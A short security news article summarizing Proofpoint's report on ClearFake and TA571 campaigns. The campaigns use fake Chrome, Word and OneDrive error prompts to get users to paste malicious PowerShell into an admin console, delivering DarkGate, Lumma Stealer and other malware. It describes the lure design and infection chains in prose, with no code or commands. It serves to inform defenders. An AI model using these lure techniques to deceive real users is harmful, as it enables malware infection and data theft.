Recently, security researchers at Proofpoint have identified multiple hacker groups exploiting fake Google Chrome browser errors, as well as errors in programs like Word and OneDrive, to trick users into installing and running malicious PowerShell scripts.
The hacker groups involved in these activities include ClearFake and TA571. ClearFake has previously used website overlay techniques to prompt visitors to install fake browser updates containing malware, while TA571 is known for distributing large volumes of spam emails.
According to Proofpoint’s findings, there are three attack chains being observed, each with variations in their initial stages. In one scenario linked to ClearFake, when Chrome users visit an infected website, a malicious script hosted on a blockchain through Binance’s smart chain contract is loaded. This script displays a fake Google warning indicating issues with the webpage display and prompts visitors to install a “root certificate,” which then copies the malicious PowerShell script to the Windows clipboard for execution in the Windows PowerShell (Admin) console.
The malicious PowerShell script executes various steps to confirm the device as a valid target, such as refreshing DNS cache, clearing the clipboard content, displaying bait messages, downloading another remote PowerShell script, and conducting anti-VM checks before proceeding with information-stealing operations.
In another attack chain, an injection script is used on a compromised website to create an iframe overlay presenting a fake Chrome browser error. Users are instructed to open “Windows PowerShell (Admin)” and paste the provided code, resulting in the same infection process.
The third attack chain involves the use of HTML attachments resembling Word documents. Users are prompted to install the “Word Online” extension to view the document correctly, with the prompts offering “How to fix” and “Automatic fix” options. The “How to fix” option copies a base64-encoded PowerShell command to the clipboard, instructing the user to paste it into PowerShell.
The “Automatic fix” option utilizes the search-ms protocol to display “fix.msi” or “fix.vbs” files hosted on a WebDAV share controlled by the remote attacker. In this case, the PowerShell command downloads and executes the MSI file or VBS script, leading to infections by Matanbuchus or DarkGate malware.
Proofpoint highlights that these attacks exploit users’ lack of awareness regarding the risks of executing PowerShell commands on their systems. The attackers also take advantage of Windows’ inability to detect and block malicious operations initiated through code pasting. The payloads observed by Proofpoint include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, ClipboardHijacker, and Lumma Stealer. While these attacks require significant interaction, each step appears convincing enough to deceive users.
Reference:
Fake Google Chrome errors trick you into running malicious PowerShell scripts